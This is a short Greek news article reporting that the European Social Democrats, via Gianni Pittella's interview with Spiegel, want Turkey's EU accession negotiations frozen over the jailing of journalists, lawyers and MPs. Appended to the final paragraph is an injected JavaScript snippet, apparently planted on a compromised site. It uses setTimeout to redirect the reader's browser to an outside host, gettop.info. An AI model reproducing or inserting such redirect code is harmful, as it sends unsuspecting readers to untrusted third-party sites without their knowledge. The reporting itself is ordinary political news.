Οι Ευρωπαίοι Σοσιαλδημοκράτες θέλουν πάγωμα της ενταξιακής διαδικασίας της Τουρκίας

0
11

 

Αν και την προηγούμενη Δευτέρα οι υπουργοί Εξωτερικών της ΕΕ στη συνάντησή τους τάχθηκαν υπέρ της συνέχισης του διαλόγου για την ένταξη της Τουρκίας, οι Ευρωπαίοι Σοσιαλδημοκράτες επιθυμούν το πάγωμα της διαδικασίας. Διαμέσω του κοινοβουλευτικού εκπροσώπου τους στο Ευρωκοινοβούλιο Τζιάνι Πιτέλα, ο οποίος παραχώρησε συνέντευξη στο Spiegel, διατύπωσαν αυτήν την επιθυμία τους. Όπως είπε ο Πιτέλα: «Δεν μπορούμε να παρακολουθούμε άπραγοι σιωπώντας, τη στιγμή που στην Τουρκία δημοσιογράφοι, δικηγόροι και βουλευτές φυλακίζονται. Εάν συνεχιστεί αυτή η κατάσταση, η Ευρωπαϊκή Ενωση πρέπει να παγώσει τις ενταξιακές διαπραγματεύσεις. Δεν είναι δική μας η ευθύνη, η αιτία είναι η συμπεριφορά του προέδρου Ερντογάν. Επιδιώκουμε μια κατά το δυνατόν ευρεία πλειοψηφία, η οποία να στείλει ένα ισχυρό μήνυμα«.

Ο Πιτέλα τόνισε επίσης ότι η πόρτα του διαλόγου παραμένει μεν ανοικτή, αλλά υπό τις παρούσες συνθήκες, οι συζήτησεις δεν έχουν κανένα νόημα.

Οι Ευρωπαίοι σοσιαλδημοκράτες προτίθενται να καταθέσουν σχετική πρόταση την ερχόμενη εβδομάδα στο Στρασβούργο. Διακοπή των διαπραγματεύσεων ωστοσο μπορούν να αποφασίσουν μόνον οι χώρες μέλη της ΕΕ με ειδική πλειοψηφία και τα μέλη δεν δείχνουν διάθεση να ακολουθήσουν το παράδειγμα των ευρωβουλευτών, σύμφωνα με το SPiegel. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here